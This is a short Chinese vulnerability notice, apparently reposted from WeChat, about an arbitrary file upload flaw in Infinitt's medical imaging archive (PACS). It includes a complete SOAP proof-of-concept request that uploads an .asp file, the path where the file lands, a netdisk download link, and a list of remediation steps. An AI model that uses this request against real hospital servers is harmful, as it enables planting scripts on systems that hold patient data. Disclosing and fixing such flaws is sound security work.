英飞达医学影像存档与通信系统 WebJobUpload接口存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
POC如下所示:POST/webservices/WebJobUpload.asmxHTTP/1.1Host: xxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: text/xml; charset=utf-8Soapaction: "http://rainier/jobUpload"Connection: closeContent-Length: 506
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <jobUpload xmlns="http://rainier"> <vcode>1</vcode> <subFolder></subFolder> <fileName>xfoward.asp</fileName> <bufValue>MTIzNDU2</bufValue> </jobUpload> </soap:Body></soap:Envelope>
链接地址如下所示:url+/1/xfoward.asp
获取方式:
链接:https://pan.baidu.com/s/1yaoh3ZCaaURhse4l4D3gjw?pwd=vno8 提取码:vno8
修复建议
1、对上传文件类型进行验证,除在前端验证外在后端依然要做验证,后端可以进行扩展名检测,重命名文件,MIME类型检测以及限制上传文件的大小等限制来防御,或是将上传的文件其他文件存储服务器中。
2、严格限制和校验上传的文件,禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限,防止木马执行。
3、对上传文件格式进行严格校验,防止上传恶意脚本文件;
4、严格限制上传的文件路径。
5、文件扩展名服务端白名单校验。
6、文件内容服务端校验。
7、上传文件重命名。
8、隐藏上传文件路径。
原文始发于微信公众号(爱喝酒烫头的曹操):英飞达医学影像存档与通信系统任意文件上传
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论